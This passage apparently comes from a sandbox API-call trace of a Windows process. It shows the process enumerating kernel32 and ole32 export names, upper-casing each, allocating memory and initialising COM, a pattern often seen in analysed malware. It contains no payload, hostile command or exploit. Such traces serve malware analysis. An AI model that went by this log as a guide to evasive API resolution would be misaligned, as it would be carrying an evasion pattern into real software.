lpString1=0x239e348, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0158.353] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0158.353] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0158.353] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0158.353] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0158.353] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0158.353] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0158.353] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0158.353] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0158.353] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0158.353] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0158.353] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0158.353] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0158.353] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0158.354] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0158.354] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0158.354] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0158.354] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0158.354] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0158.354] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0158.354] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0158.354] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0158.354] lstrlenA (lpString="BEEP") returned 4 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0158.354] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0158.354] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0158.354] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0158.354] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0158.354] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0158.354] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0158.354] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0158.354] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0158.354] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0158.354] lstrcpyA (in: lpString1=0x239e348, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0158.355] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0158.355] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0158.355] lstrlenA (lpString="CANCELIO") returned 8 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0158.355] lstrlenA (lpString="CANCELIOEX") returned 10 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0158.355] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0158.355] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0158.355] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0158.355] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0158.355] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0158.355] lstrlenA (lpString="CHECKELEVATION") returned 14 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0158.355] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0158.355] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0158.355] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0158.355] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0158.355] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0158.355] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0158.355] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0158.355] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0158.355] lstrcpyA (in: lpString1=0x239e348, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0158.355] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0158.355] CloseHandle (hObject=0xe0) returned 1 [0158.356] VirtualAlloc (lpAddress=0x0, dwSize=0x5000, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0158.359] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0158.359] lstrlenA (lpString="ole32.dll") returned 9 [0158.359] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76d60000 [0158.359] lstrcpyA (in: lpString1=0x239e34c, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0158.359] lstrlenA (lpString="BINDMONIKER") returned 11 [0158.359] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0158.359] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0158.359] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0158.359] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0158.360] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0158.360] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0158.360] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0158.360] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0158.360] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0158.360] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0158.360] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0158.360] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0158.360] lstrlenA (lpString="COBUILDVERSION") returned 14 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0158.360] lstrlenA (lpString="COCANCELCALL") returned 12 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0158.360] lstrlenA (lpString="COCOPYPROXY") returned 11 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0158.360] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0158.360] lstrlenA (lpString="COCREATEGUID") returned 12 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0158.360] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0158.360] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0158.360] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0158.360] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0158.361] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0158.361] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0158.361] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0158.361] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0158.361] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0158.361] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0158.361] lstrlenA (lpString="COFILETIMENOW") returned 13 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0158.361] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0158.361] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0158.361] lstrlenA (lpString="COFREELIBRARY") returned 13 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0158.361] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0158.361] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0158.361] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0158.361] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0158.361] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0158.361] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0158.361] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0158.361] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0158.362] lstrlenA (lpString="COGETCALLERTID") returned 14 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0158.362] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0158.362] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0158.362] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0158.362] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0158.362] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0158.362] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0158.362] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0158.362] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0158.362] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0158.362] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0158.362] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0158.362] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0158.363] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0158.363] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0158.363] lstrlenA (lpString="COGETMALLOC") returned 11 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0158.363] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0158.363] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0158.363] lstrlenA (lpString="COGETOBJECT") returned 11 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0158.363] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0158.363] lstrlenA (lpString="COGETPSCLSID") returned 12 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0158.363] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0158.363] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0158.363] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0158.363] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0158.363] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0158.363] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0158.363] lstrlenA (lpString="COINITIALIZE") returned 12 [0158.363] lstrcpyA (in: lpString1=0x239e34c, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0158.363] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0158.363] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0158.364] lstrlenA (lpString="ole32.dll") returned 9 [0158.364] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76d60000 [0158.364] lstrcpyA (in: lpString1=0x239e330, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0158.364] lstrlenA (lpString="BINDMONIKER") returned 11 [0158.364] lstrcpyA (in: lpString1=0x239e330, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0158.365] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0158.365] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0158.365] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0158.365] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0158.365] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0158.365] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0158.365] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0158.365] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0158.365] lstrcpyA (in: lpString1=0x239e330, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0158.365] lstrlenA 